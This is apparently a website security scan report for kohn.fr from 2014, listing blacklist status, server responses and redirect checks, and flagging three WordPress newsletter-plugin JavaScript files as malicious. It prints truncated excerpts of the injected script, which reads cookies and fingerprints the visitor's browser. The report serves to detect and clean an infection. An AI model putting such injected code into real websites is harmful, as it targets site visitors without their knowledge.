Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kohn.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kohn.fr/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kohn.fr/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 07 Oct 2014 02:09:26 GMT Location: http://www.kohn.fr/ Server: Apache/2.4.7 (Ubuntu) Content-Type: text/html; charset=UTF-8 Set-Cookie: _icl_current_language=fr; expires=Wed, 08-Oct-2014 02:09:27 GMT; path=/ X-Hyper-Cache: continue - no file X-Pingback: http://www.kohn.fr/xmlrpc.php X-Powered-By: PHP/5.2.9-1.illimite | clean |
http://www.kohn.fr/ | 200 OK Content-Length: 17985 Content-Type: text/html | clean |
http://www.kohn.fr/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/themes/striking_r/js/jquery.fancybox.min.js?ver=2.1.5 | 200 OK Content-Length: 27082 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/themes/striking_r/js/custom.combine.js?ver=4.0 | 200 OK Content-Length: 58941 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/themes/striking_r/js/jquery-sticker.min.js?ver=0.6.5 | 200 OK Content-Length: 7374 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/themes/striking_r/js/jquery.stickyfooter.min.js?ver=1.0 | 200 OK Content-Length: 425 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js?ver=4.0 | 200 OK Content-Length: 1064 Content-Type: application/javascript | clean |
http://www.kohn.fr/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-fr.js?ver=2.6.11 | 200 OK Content-Length: 8868 Content-Type: application/javascript | malicious |
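Malicious code - confirmed by antiviruses (see below). The excerpt shows the beginning of what appears to be a script injected at the top of the file, followed by the end of the original file; the part in between appears to have been cut by the scanner. The same opening (getCookie followed by a function that inspects navigator.userAgent) is reported for all three flagged files of the wysija-newsletters plugin, so the whole plugin directory should be compared against a clean copy rather than cleaning these files one by one.
function getCookie(name) {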
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - "alertText": "* Ce nom est déjà pris", "alertTextOk": "*Ce nom est disponible", "alertTextLoad": "* Chargement, veuillez attendre" }, "validate2fields": { "alertText": "Veuillez taper le mot HELLO" } }; } }; $.validationEngineLanguage.newLang(); })(jQuery); Antivirus reports:
| ||
http://www.kohn.fr/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.6.11 | 200 OK Content-Length: 70841 Content-Type: application/javascript | malicious |
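Malicious code - confirmed by antiviruses (see below). Excerpt (beginning of the flagged script, then the end of the original file; the middle appears to be cut):
function getCookie(name) {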
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - fadeDuration: 0.3, // Use Prettify select library prettySelect: false, // Add css class on prompt addPromptClass : "", // Custom ID uses prefix usePrefix: "", // Custom ID uses suffix useSuffix: "", // Only show one message per error prompt showOneMessage: false }}; $(function(){$.validationEngine.defaults.promptPosition = methods.isRTL()?'topLeft':"topRight"}); })(jQuery); Antivirus reports:
| ||
http://www.kohn.fr/wp-content/plugins/wysija-newsletters/js/front-subscribers.js?ver=2.6.11 | 200 OK Content-Length: 4320 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt (beginning of the flagged script only; it appears to be cut off):
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - Antivirus reports:
| ||
http://kohn.fr/test404page.js | 404 Not Found Content-Length: 12291 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kohn.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 07 Oct 2014 02:09:26 GMT
Location: http://www.kohn.fr/
Server: Apache/2.4.7 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Set-Cookie: _icl_current_language=fr; expires=Wed, 08-Oct-2014 02:09:27 GMT; path=/
X-Hyper-Cache: continue - no file
X-Pingback: http://www.kohn.fr/xmlrpc.php
X-Powered-By: PHP/5.2.9-1.illimite
GET / HTTP/1.1
Host: kohn.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 07 Oct 2014 02:09:26 GMT
Location: http://www.kohn.fr/
Server: Apache/2.4.7 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Set-Cookie: _icl_current_language=fr; expires=Wed, 08-Oct-2014 02:09:27 GMT; path=/
X-Hyper-Cache: continue - no file
X-Pingback: http://www.kohn.fr/xmlrpc.php
X-Powered-By: PHP/5.2.9-1.illimite
Second query (visit from search engine):
GET / HTTP/1.1
Host: kohn.fr
Referer: http://www.google.com/search?q=kohn.fr
Result:
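The result is similar to the first query. No suspicious redirects were found. Note that this test covers only server-side HTTP redirects; the scripts flagged as malicious above run in the visitor's browser and are not exercised by it.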
GET / HTTP/1.1
Host: kohn.fr
Referer: http://www.google.com/search?q=kohn.fr
Result:
The result is similar to the first query. No suspicious redirects were found.